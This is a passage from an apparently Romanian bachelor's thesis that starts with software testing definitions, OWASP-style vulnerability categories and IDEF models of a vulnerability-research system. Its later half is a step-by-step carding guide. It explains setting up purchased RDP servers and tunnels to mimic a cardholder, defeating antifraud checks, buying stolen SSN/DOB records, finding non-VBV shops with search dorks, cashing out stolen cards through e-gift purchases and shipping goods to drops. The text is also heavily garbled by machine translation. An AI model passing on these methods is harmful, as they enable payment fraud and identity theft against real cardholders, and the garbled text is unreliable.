baza utilizării de către utilizatorii finali / clienții peste o anumită perioadă de timp limitată.
Compatability testing – testare a software -ului cât de bine funcționează într -un anumit hardware /
software / sistem de operare / de rețea / etc. mediu inconjurator
NonFunctional Testing
Performance testing – Termenul adesea utilizat în mod interschimbabil cu "stres" și testarea
"sarc ina". În mod ideal de testare "performanță" (și orice alt "tip" de testare) este definit în documentația
cerințelor sau de asigurare a calității sau a planurilor de testare
Stress testing – Termenul adesea utilizat în mod interschimbabil cu "sarcina" și t estare
"performanță". De asemenea, folosit pentru a descrie astfel de teste ca testarea functionala sistem in
timp ce sub sarcini neobișnuit de grele, grele repetarea unor acțiuni sau a intrărilor, de intrare de valori
numerice mari, interogări complexe ma ri într -un sistem de baze de date, etc.
Load testing – testarea unei cereri sub sarcini grele, cum ar fi testarea unui site web sub o serie de
sarcini pentru a determina în ce moment se degradează sau nu un timp de răspuns al sistemului.
Recovery testing – testarea cât de bine un sistem de recuperare de accidente, defecțiuni hardware,
sau alte probleme catastrofale

18
Failover testing – în mod tipic utilizat în mod interschimbabil cu "testare de recuperare"
Security testing – testarea cât de bine sistemul de protecție împotriva accesului neautorizat intern
sau extern, deteriorarea intenționată, etc; poate necesita tehnici de testare sofisticate.
Other Testing Methods
Exploratory testing – de multe ori luate pentru a înțelege un test de software creativ , care nu
este informală bazată pe planuri de testare formale sau cazuri de testare; testere poate fi învățarea
software -ul așa cum l -au testat.
Ad-hoc testing – similar testelor de explorare, dar de multe ori să se înțeleagă că testerii au
înțelegere sem nificativă a software -ului înainte de a testa.
Context -driven testing – Testarea condus de o înțelegere a mediului, cultura, și care sunt
destinate utilizării software -ului. De exemplu, abordarea de testare pentru -viață critice software
echipament medica l ar fi complet diferit decât cel pentru un joc pe calculator low -cost.
Comparison testing – comparând punctele slabe și punctele forte software pentru produse
concurente.
Alpha testing – testarea unei aplicații atunci când se apropie de finalizare de de zvoltare;
modificări minore de design pot fi făcute încă ca urmare a unor astfel de testări. În mod obișnuit
efectuată de către utilizatorii finali sau alte persoane, nu de către programatori sau testeri.
Beta testing – testarea când dezvoltarea și testar ea sunt, în esență, finalizate și bug -uri finale și
probleme trebuie să fie găsit înainte de lansarea versiunii finale. În mod obișnuit efectuată de către
utilizatorii finali sau alții, nu de către programatori și testeri
Mutation testing – o metodă pentr u a determina dacă un set de date de testare sau de cazuri de
testare este utilă, prin introducerea în mod deliberat diferite modificări ale codului ("bug -uri") și
retestarea cu originalul de testare de date / cazuri pentru a determina dacă sunt detectate "bug -uri.
Implementarea corectă a necesită resurse de calcul mari.
Metode de exploatare
Injection – cel mai des folosită metodă, injection este un tip de atac asupra bazelor de date î n
care se fac select cu anumit query ,în unele cazuri se mai face injection prin anumite futures a codului
PHP
Broken Autentification – Funcțiile de aplicație legate de autentificare și gestionarea sesiunii sunt
adesea implementate incorect, permițând atacatorilor să compromită parolele, cheile sau jetoanele
sesiunii sau să exploateze alte defecte de implementare pentru a -și asuma temporar sau permanent
identitățile altor utilizatori.
Sensitive Data Exposure – Multe aplicații web și API -uri nu protejează în mod corespunzător
datele sensibile, cum ar fi financ iar, asistență medicală și PII. Atacatorii pot fura sau modifica astfel de
date slab protejate pentru a efectua fraude cu cardul de credit, furt de identitate sau alte infracțiuni.
Datele sensibile pot fi compromise fără protecție suplimentară, cum ar fi c riptarea în repaus sau în
tranzit și necesită precauții speciale atunci câ nd sunt schimbate cu browserul.
XML External Entities (XXE) – Multe procesoare XML mai vechi sau slab configurate
evaluează referințele entităților externe din documentele XML. Entitățile externe pot fi utilizate pentru a
dezvălui fișiere interne folosind gestionarea URI a fișierelor, partajarea fișierelor interne, s canarea
porturilor interne, executarea codului de la distanță și atacurile de refuz de serviciu.

19
Broken Access Control – Restricțiile privind ceea ce utilizatorii autentificați au voie să facă nu
sunt adesea aplicate în mod corespunzător. Atacatorii pot ex ploata aceste defecte pentru a accesa
funcționalități și / sau date neautorizate, cum ar fi accesul la conturile altor utilizatori, vizualizarea
fișierelor sensibile, modificarea datelor altor utilizatori, modifi carea drepturilor de acces etc.
Security Mis configuration – Configurarea greșită a securității este cea mai frecvent întâlnită
problemă. Acesta este în mod obișnuit rezultatul configurațiilor implicite nesigure, configurații
incomplete sau ad -hoc, stocare în cloud deschis, anteturi HTTP neconfigurat e și mesaje de eroare
verbos care conțin informații sensibile. Nu numai că toate sistemele de operare, cadrele, bibliotecile și
aplicațiile trebuie să fie configurate în siguranță, dar trebuie să fie patcha te și modernizate în timp util.
Cross -Site Scripti ng (XSS) – Defecțiuni XSS apar ori de câte ori o aplicație include date
neîncredute într -o nouă pagină web, fără validare sau evadare corespunzătoare sau actualizează o pagină
web existentă cu date furnizate de utilizator folosind o API -ul browserului care poate crea HTML sau
JavaScript. XSS le permite atacatorilor să execute scripturi în browserul victimei, care pot deturna
sesiuni de utilizator, deface site -uri web sau redirecționa utilizat orul către site -uri dăunătoare.
Insecure Deserialization – Deserializarea nesigură duce adesea la executarea de la distanță a
codului. Chiar dacă defectele de deserializare nu duc la executarea de la distanță a codului, ele pot fi
folosite pentru a efectua atacuri, inclusiv atacuri de redare, atacuri de injecție ș i atacuri de escaladare a
privilegiilor.
Using Components with Known Vulnerabilities – Componentele, cum ar fi bibliotecile, cadrele
și alte module software, rulează cu aceleași privilegii ca și aplicația. Dacă este exploatată o componentă
vulnerabilă, un astfel de atac poate facilita pierderea de date sau preluarea serverului. Aplicațiile și API –
urile care folosesc componente cu vulnerabilități cunoscute pot submina apărarea aplicațiilor și vor
permit e diverse atacuri și impacturi.
Insufficient Logging & M onitoring – Înregistrarea și monitorizarea insuficiente, însoțită de
integrarea lipsă sau ineficientă cu răspunsul la incident, permite atacatorilor să continue sistemele de
atac, să mențină persistența, să pivoteze către mai multe sisteme și să modifice, să extragă sau să
distrugă date. Cele mai multe studii despre încălcări arată că timpul de detectare a unei încălcări este de
peste 200 de zile, de obicei detectat de părți externe, mai degrabă decât de procesele interne sau de
monitorizare .
2 Modelarea ș i Proiectarea sistemului

Introducere în IDEF se referă la o familie de limbi de modelare în domeniul sistemelor și
inginerie software. Acestea acoperă o gamă largă de utilizări, de la modelarea funcțională la date,
simulare, analiză orientata pe obiect/ proiectare și dobândirea de cunoștințe.
Componentele din familia IDEF mai -larg recunoscute și folosite sunt IDEF0, o structure de
limbaj de modelare funcțională pe SADT, și IDEF1X, care abordează modelele de informații și
probleme de proiectare a bazei d e date. Familia IDEF de metode:
– IDEF0: pentru îndeplinirea funcției de modelare (scop: descriere)
– IDEF3: pentru Process Modeling. (scop: descriere)

20
Scopul IDEF este folosit pentru activități necesare pentru a sprijini analiza de sistem,
proiectarea, îmbunătățirea sau integrarea de modelare.
Inițial, IDEF a fost dezvoltat pentru a îmbunătăți comunicarea între oameni care încearcă să
înțeleagă sistemu l. Acum, IDEF este utilizat pentru documentare, înțelegere, proiectare, analiza,
planificare, și Integrare.
O diagramă de flux de date (DFD) este o reprezentare grafică a "fluxului" de date prin
intermediul unui sistem informatic, de modelare a aspectelor sale de pro ces. O DFD este adesea utilizată
ca o etapă preliminară pentru a crea o imagine de ansamblu a sistemului, care pot fi elaborate ulterior.
DFD S poate de asemenea fi utilizată pentru vizualizarea de prelucrare a datelor (proiectare
structurată). O DFD arată ce fel de informații vor fi introduse la și spre ieșire din sistem, în cazul în care
datele vor veni de la și vor pleca spre, și în cazul în care datele vor fi stocate. Nu arată informații despre
calendarul de proces sau informații despre proce sele ce se vor opera în ordine sau în paralel (care este
prezentat pe o schemă logică).
Scopul diagramei de flux de date pot fi utilizate pentru a oferi utilizatorului final o idee fizică în
cazul în care datele de intrare pe care le are în cele din urmă au un efect asupra structurii întregului
sistem de la sco pul de a trimite si a raporta.
Cum un sistem este dezvoltat poate fi determinat printr -un model de diagrama de date. În cursul
dezvoltării unui set de diagramele cu flux de date nivelat, analistul / designerul este obligat să se
adreseze in modul în care sistemul poate fi descompus în subsisteme componente, și de a identifica
datele tranzacției în modelul de date. Diagrame de flux de date poate fi utilizata atât în analiza și in faza
de proiectare a ciclului de viață a sistemului dezvoltat.
2.1 Modelarea funcțională a sistemului în notația IDEF0
Subiectul modelării
Ca subiectul modelării este luat sistemul informațional ”IVsic” care este o cercetare în domeniul
securității cu scopul evedențierii unor probleme legate de date
Scopul modelării
Pentru ce este nevoie de acest sistem?
Nevoia principală din care a m ajuns la acest subiect ca temă pentru licen ță este motivul de a lipsi
black hat de surse financiare pe care le folosesc în aceleaș i atacuri asu pra companiilor internationale și a
băncilor diferitor țări , care in fine păgubeste economia și viața utilizatorilor atit in mediu real cît ș i
virtual.Cel mai des sunt furat e datele credențiale, care mai apoi sunt prelucrate prin diferite acounturi
create tot cu date le furate ,cel mai des se crează conturi bancare prin sisteme speciale care controlează în
ce bank persoana x are cont sau o alta metoda este utilizarea AEP ca re la fel se crează minim 10
acounturi pentru fiecare ș i prin ele are loc transferul de resurse și in final resursele pot fi scoase ca

21
“white” și fară probleme trimise pe conturi reale de paypal, amazon,ebanking și dropuri.Din cele
enumerate reise ca mai sun t alte scheme de utilizare a datelor s.a.m.d.
Obiectivele principale care sunt puse în această lucrare de licență :
– de a evidenția problema protectiei datelor personale cit și corporative ;
– problema informarii utilizatorilor protectiei datelor ;
– complexitatea de expl oatare a sistemelor existente cu scopul de a obtine date .
Ca urmare acestei cercetari se va obtine ce foarte superb pentru toti.
O comunitate de oameni care se lupta cu cyberhacking!!!
Punctul de vedere
Viteza de dezvoltare a părții h ard în calculatoare este foarte mare și din motivul aceste este
foarte usor de exploatat orice sistem ce conț ine partea software, chiar insă și sistemele hardware fiindcă
ele la la fel lucrează pe cod machine și toate ac estea se poate de efectuat datorită capacită ților mari a
PC-lor contemporane ce creste de an cu an iar nivelul de securitate pentru ele ramîne la acelasi
nivel,astfel reise la momentul actual să spargi un PC este foarte usor care la rîndul său se va transforma
în ID și pri n intermediul lui se va efectua atacuri asupra altor surse ,la rî ndul lor ele vor servi ca un nivel
de proxy.După logica existenta nu e greu de inteles că ID obținute la fel sunt prelucrate și sunt copiate
datele de pe PC infectate ,iar nici un antivirus nu va identifica a cțiunile ilegale asupra PC infectate
Pentru a evita aceste acțiuni este necesar de a utiliza un set de reguli :
-de închis toate porturile neutilizate
-de restictionat accesul la tot numai prin WindowsNT
-să fie vpn conectat 24 /24 și fără vpn sa fie în chisă conexiunea la Inet
-de actualizat BD la antivirus
-de închis actualizarile la Sistema de operare
-toate cookie sa fie puse in mod block all cookies
În ceea ce urmează vom analiza diagrama de context vezi figura 3.1.

22

Figura 3.1 – Diagrama de context “Identificarea Vulnerabilităților Sistemelor Informaționale ”
În diagrama curentă este reprezentat tot sistemul informațional care la rîndul său este o cercetare
științifica bazată pe prelucrarea datelor și exploatarea lor, aici sunt redate un set d e parametri dupa care
se conduce sistemul:
Intrările:
– maxim packete trimise;
– încercare injectare cod;
– date scanare porturi;
– informație versiune.
Ieșirile:
– tip de vulnerabilitate determinat;
– obținere date confidențiale;
– host crashed cu tip de vulnerabilitate DDOS;
– informaț ie pentru proprietar.
Reglări:
– date versiune;
– TTL;
– organizarea canalelor fizice;

23
– construcția architecturii.
Control:
– catalog versiune;
– max canal de Transmitere;
– procesele de conducere a securitații;
– cadrul legislativ.
Toate aceste da te și componente interacționează intre ele și crează sistemul dat, iar fară un
parametru in cei 4 parametri sistemul nu va putea lucra și se va considera incomplect, însă scopul este
de a prezenta comunității despre posibil e fraude de date care ar putea dăuna vieții virtuale
Mai jos este reprezentat diagrama de decompoziție nivelul unu. În ea se observă procesele de
bază ce se produc în sistem. Vezi figura 3.2 detalii despre procesele de baza a sistemului.

Figura 3.2 – Diagrama de decompoziție nivelul unu pentru sistem
Sistemul informațional implementat va conține două componente principale care vor utiliza în
comun doua c omponente interlegate intre ele , partea soft și cea hardware. Fiecare din ele avînd propriile
intrăr i și iesiri ,însă în un s ingur caz ele se interconectează î n procesul a datelor scanate
Mai jos este reprezentat diagrama de decompoziție nivelul unu. În ea se observă procesele de
bază ce se p roduc în sistem. Vezi figura 3.3 detalii despre procesele de ba za a sistemului.

24

Figura 3. 3 – Diagrama de decompoziție nivelul doi pentru sistem
În diagrama dată putem vedea 4 componente de baza și care au 2 intrari concomitent (informație
versiune și incercare injectare cod), fiecare din aceste componente sunt legate intre ele prin datele de
ieșire de la componenta precedentă și prin procesul care ruleaza procesu l de transmitere comenzi pentru
următorul nivel. Fiecare nivel sau componentă răspunde de funcționalitatea proprie și in mod general
poate fi descompusă la rîndul său in alte componente mai mici.
Mai jos este reprezentat diagrama de decompoziție nivelul u nu figura 3.4 .

Figura 3. 4 – Diagrama de decompoziție nivelul unu pentru Avertizare Client
În general procesarea datelor are loc prin mai multe metode și cu mai multe scopuri, în cazul
curent ca date de intrare sunt date componente d espre OS ș i la ieșire 2 tipuri de ieșiri tip de

25
vulnerabilitate determinat și transmiterea avertizare p roprietar. Avertizarea are loc prin un raport cu un
format special de reprezentare de vulnerabilitați care trebuie sa fie descris detaliat fiecare pas pină la
identific area vulnerabili tăților,Dupa toate aceste descrieri se adun ă și se asamblează un raport a starii
sistemului
Modelarea fluxului de procese sau IDEF3 modeling, este o metodologie de modelare care
descrie și documentează în mod grafic colectînd informație din fluxul de procese, relația dintre procese
și obiectele importante care sunt o parte a procesului.
Fiecare scenariu are o descriere a procesului și poate fi folosit pentru facilitarea comunicării și
documentării funcțiilor. Mai jos este ilustrată diagrama de decompoziție în IDEF3 pentru subprocesul
„Decodificarea audio” figura 3. 5. care se refera la IDEF0 parte a hardware

Figura 3. 5 – Diagrama de decompoziție nivelul unu prin IDEF3 la nivel hardware
Cum se vede procesul detaliat conține în sine patru subprocese numite:
– scanarea tuturor componentelor SO ;
– conectare la Porturi ;
– obținere privilegiu ;
– încercare injectare cod .
Datele de intrare sunt un set de informații ce este furnizat de un utilizator care așteptă un rezultat
anumit , în cazul curent ultizatorul este exploatatorul de sistem

26
Figura 3. 6 – Diagrama de decompoziție nivelul doi prin IDEF3 la nivel software

Figura 3. 6 – Diagrama de decompoziție nivelul unu prin IDEF3 access la KH
În diagrama curenta este reprezentat un process de modelare maximal posibil de cel real prin
utilizarea a mai multor tooluri ,cu scopul de a obtine o rată minim80 % similitudine pentru FAANG și
alte servicii pe care le utilizează un user adevarat.Toată similitudinea de obicei se bazeaza pe datele din
browserul jetfei,În continuare va urma un setul de accțiuni și pasi reali pe care ii efectuază un adevarat
Black Hat:
Cum în general are loc conectarea la RDP Start – Run => mstsc
Sau, Start – Conexiune la distanță.
Introduce rea IP-ului în prima linie, apoi aut entificarea și parola contului.
De ce este nevoie RDP și care sunt avantajele sale?
– simula rea complet ă (computer) ;
– convenabilitatea muncii și o probabilitate redusă de adunare;
– crearea un tunel și alte programe software pentru lucrul la Dedik.
Dacă Dedik nu este atins de nimeni, acesta este un plus uriaș. Deoarece acesta este adevăratul
fier al american ului sau europeanului.
Conturi Speciale:
– numai dacă ai lucrat deja cu el și ai făcut o tranșă, nimic nu va funcționa pentru tine.

27
2.2 Parametri care trebuie respectați:
1) Scurgeri DNS – salturi. DNS trebuie să fie 1. După cumpărarea RDP , are loc actualizarea
memoria cache DNS.
Cum se face cu – GV în google. Pentru sisteme diferite, un algoritm diferit.
Dacă totuși DNS sare pe RDP -ul tău – se pune tunelul.
Se pune tunelul prin programul Bitvise. Bitvis este potrivit și pentru lucrul cu o mașină virtuală
sau cu o fundație. Se Folosite pachetul Bitvise + Proxyfire.
Are loc lurea pe Dedik sub un fermoar, se procură întotdeauna mai întâi un Dedik , apoi ss, etc.
Cel mai bine este să fie scr is vânzătorilor de lăcate pe care e mai bine de folosit (fermoarele ss -urilor
tale).
– 80.443.3389,22 – aceste porturi ar trebui închise. După achiziție, nu le veți închide, deoarece
porturile sunt deschise de un anumit program pe dedik. Închiderea acestuia poate fi lăsată fără.
– Webrtc, flash, etc. Nu treb de atins – bun RDP pur, totul este în regulă! Adică nu trebuie oprite.
Webrtc – ip ar trebui să fie 1.
Dacă WebRtc arată ip -ul în lanț, trebuie pus plugin -ul în crom sau înlocuit manual.
https://cryptoworld.su/%D0%B1%D0%BE%D1%80%D1%8C%D0%B1%D0%B0 -%D1%81 –
%D1%83%D1%82%D0%B5 % D1% 87% D0% BA% D0% BE% D0% B9 -ip-% D1% 87% D0% B5%
D1% 80% D0% B5% D0% B7 -webrtc / aici puteți citi cum se face.
Flash și Java sunt mereu pornite, doar pe Dedik!
Ora și limba trebuie să corespundă locației persoanei (titularul cardului / titularul contului
bancar / paypal)
Blocurile spam nu ar trebui să fie deloc. Maxim 2.
Antifraud (în special în PP) îi plac imprimările în special audio. Prin urmare, după o intrare
reușită, vă sfătuiesc să nu mergeți nicăieri chiar și pe bază, ci așteptați până la primirea mărfii etc.
Lucrul în principal cu crom și mozilla. În crom în setări, are loc activarea automată este
necesară. Acest lucru va oferi avantaje pentru f raudă .
Înainte de fiecare unitate, se umplu un cookie, deoarece acestea sunt verificate de antifraud.
Cookie -uri trebuie încă rcate atunci când mergem pe site -uri!

28
Diagrama de decompoziție a componentei socksV5 sau tunel pentru modelarea Zip -lui conform f ig 3.7

Figura 3.7 – Diagrama IDEF3 de decompoziție de nivelul 1
În diagrama data este reprezentat cel mai principal pas de decompoziție fară care nu ar fi
posibilă exploatarea datelor de orice tip de caracter și nici un fel de atac nu va fi posibil din motiv
inconvenienței ip ,iar ip este principalul identificator al unui user adevărat.
Ce se face după conectarea:
– instalare CCleaner și curățare complet ă.
– intrare în bro wser și ștergerea cache -ul complet.
– actualizare cache -ul DNS, în cazul în care acesta se oprește – singu ra cale de a ieși
este de a pune un tunel.
– setare ora și fusul orar sub kh .
– dacă dedikul a lucrat cu PP, faceți următoarele:
Start – executare, intrare în regedit. Următ orul este Edit -Find. Introducere paypal în linie, punere
3 marcaje, clic pe Găsiți Următorul. Ștergem tot ce a emis editorul.
– server.conf și .ovpn înregistrare mssfix 0, ascund amprenta VPN
Căutarea fișiere cu aceste nume, dacă nu, atunci ciocănim.
Deci știm cum se conectează la rdp / cum are loc alegerea
Înainte de a conecta la Dedik, are loc activarea bazat a pe VPN. În mod ideal, sub oraș: kh ss /
acc pp / proprietarul ba.

29
Ce trebuie de stiut dacă DNS sare cu putere sau curge pe rdp tău:
– utilizare brow serul din vector și înregistrare dns în setările sale;
– lanțul tunel ului sa u ciorapului (SSH / SOCKS4 (5));
– intrare în setările adaptorului, facere clic pe conexiunea, apoi pe proprietăți.
În conti nuare, fila rețelei este IPv4. Se u tilizează următoarele adrese ale serverului DNS și se
introduc ip RDP acolo. Dacă nu s-a sch imbat nimic, introduc un alt DNS și luațre de la Google, este
scris mai jos de unde este posibil de al obține.
Folosim jumperul DNS și intră în dn -urile orașului de care avem nevoie (sub dedicație). Puteți
găsi DNS în Google, scriind: DNS Paris.
Analiza celelalte moduri de lucru.
Ce avem nevoie pe ntru baza:
Proxyfire + Bitvise – pentru conectarea SSH și SOCKS5.
Firewall – un sertar sau la discreția lui .
Dublu SSH Tunel Manager pentru a distribui tune lurile sau șosetele prin wi -fi.
Vbox din vector, socks sau tunel se agață de bază, apoi traficul trece automat prin mașina
virtuală. Bun pentru PayPal, mediu pentru ss. Prin reglare, etc., la canalul / site -ul vectorului.
Linken Sphere, ls.tenebris.cc. Bun pentru lucrul cu ss și lucrul cu jurnalele. Pentru un băț, trebuie
să faceți distribuții reale de oameni din America sau Europa.

P.S ajută la instalarea după documentarea complet instruită pe site -ul lor web. Nu pierde timpul!
– multilogin, b un pentru pp, teribil pentru ss;
– samara we blab (Google), medie pentru muncă, dar ca opțiune potrivită.
Dacă batem platformele (eBay) / magazinel e, cel mai bine este să trimita zgârcit, pentru a nu
face evidență la produs. Puteți trimite, de asemenea, prin picătură. Dacă scăderea este curată și nu a
apărut nici un karzh la adresa sa, traficul său, va crește. Mai departe de cădere , fie la zgârcit, fie la casa
lui (nerentabil ).
Vânzător -online.com (Germania, Anglia) s unt potrivite pentru orice subiect, dar pot bloca un
cont, deoarece știu deja foarte bine despre carbohidrați, dar înțeleg, de asemenea, că se hrănesc .
La mijloc, să fac poze, se elimină complet toate etichetele etc. În declarație trebuie scris că
mărfuril e vor fi utilizate, dacă sunt electronice. Dacă hainele – boo. Dacă bijuteriile sunt bijuterii.
Cutiile din mărfuri și mărfurile în sine trebuie trimise separat. Doar mutarea mărfurilor într -o altă
suită. Un drop este terenul de mijloc. Când merge în inter ior, dacă există o linie pentru acest lucru în
maga zin, vă indică numărul drop .
Mediatorul se înregistrează pe docurile din stânga. Le puteți lua pe darkmoney.cc
socks ru și ukr – airsocks.in
De asemenea, se poate înregistra un intermediar pentru o persoan ă din SUA.

30

ABC – reconciliere facturare / expediere. Facturarea este adresa pe care kx a indicat -o la
înregistrarea ss -ului / primirea acesteia la bancă. Expediere către unde trimiteți acest produs sau acel
produs pentru a -l primi în viitor.
Funcționează peste tot, cu excepția țărilor din Europa (există ABC în Anglia), India, Coreea de
Sud, Rusia, CSI, China și țările din Asia.
Adică, atunci când se crează , trebuie să ne încadrăm complet sub kx (deținător de carte – titular
de carte)
Potrivire adresa de fa cturare.
Ridicare tunelul / șose ta sau Dedik sub fermoarul său.
Daca a fost cumparat un card, merge pe site pipl.com și vezi dacă adresa de facturare este
normală pe ea. People com caută s tăpîn. Săpunul nu este întotdeauna în s s, în acest caz puteți înscrie.
Vă sfătuiesc să utilizați doar primul site. Pe lângă bancă, va exista un t ip de card și nivelul
acesteia. Nivel card – (clasic, business, aur).
De ce este nevoie:
– google
– capacitatea de a face solicitări.
Să începem cu unul simplu, pentru un început se decide ce magazin de țară este nevoie. De
exemplu, Statele Unite ale Americii. Deschidem google, în linia de căutare se scrie următoarea întrebare
– shop + inurl: .com. Valoarea magazinului vorbește de la sin e, nu merită explicată. Următorul este
semnul "+", vă permite să filt rare mai bine cererea. Următoarea solicitare inurl: – indică faptul că
expresia pe care o căutăm ar trebui să fie în link / link / url. De exemplu, am sc ris valoarea – .com.
Căutarea va oferi magazine ale căror domenii se vor încheia în .com.
Cererea noastră nu este perfectă, este luată ca exemplu și, prin urmare, nu ar trebui să vă bazați
peste tot. Apropo, este posibil se specifice un pic punând ghilimele la încep ut și la sfârșit. Acest lucru
permite să obțină răspunsuri de căutare mai exacte la întrebările noastre de la Google.
Pentru început, să uităm de magazinele americane, 90% dintre cardatori le caută. Vom merge pe
invers, vom căuta magazine din al te țări. În Yus, magazinele esuază foarte repede și mor. Dacă căutați
ceva în Yus, atunci nu doar magazine, puteți căuta magazine, dar cu bunuri digitale. La fel și în Yus este
plin de alte servicii despre care vom vorbi mai târziu.
Accesăm – www.c.weare1.info. Acesta este un site cu o listă de țări.
De exemplu, se alege Republica Cehă. Acum trebuie să se afle însuși domeniul ceh.
Merge aici – www.101domain.ru. Vede meniul „Domenii internaționale”.
Aceasta este o foaie de înșelăciune foarte bună pentru noi. Vedem o listă d e țări cu dome niile lor
interne
De când alege Cehia, se uită la domeniul ceh. Este înregistrat un singur domeniu ceh, acesta este
.cz.

31
Se descarca browserul Google Chrome, va fi util. Și începe să experimenteze cu solicitări. De
exemplu, magazinul + plata vizei + între aga lume + site -ul: .cz.
Va analiza cererea noastră:
magazin – totul este clar aici, acesta este un magazin.
plătiți viză – lăsați -ne clar că sunt interesați să plătească ss. Aici puteți schimba cererea în mc,
maestro, paypal etc.
la nivel mondial – o valo are care indică faptul că avem nevoie de un magazin cu livrare la nivel
mondial.
site: .cz – bine, la finalul solicitării indică domeniul. Cererea va oferi magazinele.
De asemenea, putea adăuga aici căutarea articolului dorit – de exemplu, introduceț i + iPhone5 +
în centrul frazei
Regula – nu lua magazinele din primele pagini ale căutării. În acest caz, ignorăm cu îndrăzneală
această regulă și începem să sortăm ma gazinele (nu se aplică în SUA).
Este mai bine să facă solicitări în FireFox și să parcurgeți magazinele din Chrome, deoarece
cromul va traduce în mod normal ma gazinul ales din cehă în rusă /română , ceea ce ne va fa cilita foarte
mult activitatea.
Pentru a găsi un magazin într -o țară care nu este tradusă în eng leză, schimbăm limba tastelor. De
exemplu, dacă doriți să faceți cumpărături în Germania doar în germană, introduceți cheile în Google
traducere și traduceți -le în germană.
Drept urmare, pentru a căuta un magazin german, trebuie să intrăm :
magazin + bezahl en m it Visa + weltweit + site: .de.
Desigur, în acest caz, veți primi și magazine cu traducere, dar în lista generală veți găs i și cele
fără traducere.
Întrebările sunt cele mai bune căutări. La cerere, puteți citi mai multe pe Internet, există multe
bunătăți pentru compilare. De asemenea, este bine să căutați magazine prin programe de afiliere, acolo
puteți găsi magazine care tocmai s -au deschis și nu numai magazine.
E-gift nu trebuie confundat cu Cardul gift, Cardul gift este un card fizic pe care îl puteți trimite
unui intermediar sau puteți reduce%. Uneori, în magazine, în loc de cadouri electronice, ei scriu cadou.
Statele Unit e sunt bune pentru a procura cu Egif t-ul pentru cumpărături. Adică gif -urile
anumitor magazine (echipamente, lucruri, ceas uri, bijuterii etc.), deoarece magazinele se deschid
adesea, iar SUA adoră gif -urile.
Fonturile xbox, psn, steam etc. sunt luate atât în UE, cât și în SUA. Oamenii avari iau imediat
acest Cadou, dar Europa este mai bună.
Accentul este pus pe ele, pe caut area magazine lor cu trimitere instantanee (instant – instant) și
astfel încât cadoul să se încadreze în contul tău personal.
Cel mai bine este să începe să lovești UE partener non -vbv sau Canada în Europa.
Mat – Canada, Franța (non -vbv), Spania, Polonia, S uedia.

32
Covorul lui Yu s în Europa va urca și el bine.
Material fără VBV – fără VBV (protecție suplimentară).
Există, de asemenea, materiale cu resetarea WWW. Aceasta necesită, de regulă, un ssl. O astfel
de covorașă este slab pasibilă, nu sfătuiesc să o fol osesc ă deloc.
Cum se găsesc cumpărători i
Se Intră pe Allkeyshop -uri – magazine de încredere . De asemenea, putea căuta magazine,
căutând chei pe ntru jocuri. De asemenea, putea combina aceste taste, de regulă, acestea vin înto tdeauna
cu ușurință. 2 -3 taste.
Să analizează conducerea unui e -gift folosind exemplul site -ului egifter.com. Site -ul este dificil
pentru prima dată, ai nevoie de un sistem excelent. Sau cel mai pur Dedik din 1 mână, sau Android, sau
vnc. Vectorul v irtual se poate strecura și el.
Nume destinatari – introducere numele (fictiv, apoi de la un prieten / tată / mamă etc.) căruia îi
va trimite un e -mail.
Email destinatari – realizăm emeil sub numele personajului dvs. de ficțiune. Vă sfătuiesc să
cumpăraț i o bază de adreselor vechi, deoare ce frauda arde uneori că emeil a fost făcut recent.
# mail buyaccs.com
Destinatari mobile – google / textnow etc. Cel mai bun număr din stânga, care nu va fi disponibil.
Număr vechi al unor cafenele / servicii etc. Căutați orice magazin din orașul kh, schimba re
ultimele cifre. Dacă magazinul sună, atunci lucrați cu clopotul.
Verificăm ora, data, centura, astfel încât să coincidă cu virtualul sau cu bunicul. Ar trebui să fie
automat corect. În caz contrar, bunicul / ciorapul sau tunelul pe care îl cocoșați.
Your Name Your Email – numele este ultimul nume kx și e -mailul pe care a făcut pentru acesta
(yahoo, aol, gmail sau fraud.cat). O situație similară cu cea a personajului de ficțiune. Este posibil ca
Gmail să nu solicite SMS -uri dacă aveți un sistem curat.
Mesaj – scriem mesaje mici, după tipul lui: catch, hold, etc.
Apoi, există o plată, introduceți toate informațiile cu ss. Telefonul este stângaci sau păzește, dacă
este neconfortat, dar încă îl șterge și dă puncte pentru el.
Uneori, când se solicită la bancă, ei recunosc telefonul kx.
Egift va cădea pe poșta ta și pe e -mailul (prietenului tău) de ficțiune.
Sau doar trimiteți -vă un e-mail dacă comandați * Tipo *
Cel mai bine este să căutați magazine în unele locuri promoționale etc. Sau începeți cu întrebări,
apoi mergeți la alte magazine și așa mai de parte. Activează creativitatea.
Ce este nevoie pentru a auto -înfunda:
– fulka – Ssn + Dob. Fulkas costă de la 15 ruble. Ssn Adăugați numai la cerere. Sau când
depunem la sold prin butonul Adăugare bani.
– nu uitați să înființarea bunicul. Următorul este Edit -Find. Introduceți paypal în linie, puneți 3
marcaje, faceți clic pe Găsiți Următorul.

33
Dacă lucrăm cu virtual, 1 virtual, 1 autoreglare, exportăm întotdeauna cookie -uri din browserul
cu care lucrăm.
Cont GV – Google Voice, unde v a primi SMS. Pentru început, v a lucra doar în Statele Unite. Un
număr, textnow sau text + este de asemenea potrivit. Î i va spune cum să faci. Vă sfătuiesc să utilizați
doar GV.
Cont bancar, urmăriți, bofu etc., Cetățean, Santrast cu reduce re la CD -ul companiei, 53. Cu cât
este mai balik pe cont, cu atât mai bine (de bază) Puteți lucra și cu AP -uri. Refs merg bine cu el. Acum
multe bănci vin excelent, pe care vi le voi oferi uneori. Cele mai bune dintre toate sunt Key Bank, TD
Bank, Suntrust .
Început cu Chase, Suntrust în vrac.
Card VCC (card de credit virtual) – un card virtual, există magazine. Sau înregistrați un card de
plată în avans (Walmart, Akimbo, Go Bank). Va exista o listă cu toate cardurile prepay disponibile. Cel
mai potrivit se duce la banca, Cont acum. Visa se potrivește bine. Puteți face un ValmartManicard și să
îl legați, dar după ce ați legat ceva, punctele antifraud sunt aruncate, așa că este mai bine să faceți o
pauză mai târziu.
Cardurile Nulevka sunt tricotate astfel încâ t eliberarea de sine este eliberată. Adesea necesită
atașarea unei hărți.
Înscrieți ss. Dacă există o înscriere și acest Fulka (Fulka sub ss), care nu este înregistrat în PP – îl puteți
lega în PP. Deși înscrierea este mai bine să o bată imediat sau să îmb ine bunica prin merch (legând
cartea acolo). Sau traduceri. Acest lucru este totul în cursurile viitoare.
În imaginea de mai jos este redat un nou tip de atac asupra datelor credentiale, aici mai mult este
redat configurarile care permit crearea unei sesiuni 99.9% identică cu cea a proprietarului datelor
credentiale, ceia ce permite utilizarea liberă a datelor și liberul access la orice resurs web pe care a intrat
cel puțin o dată și sa logat folosind login și parolă, exemplu poate fi accesul în inter net banking si
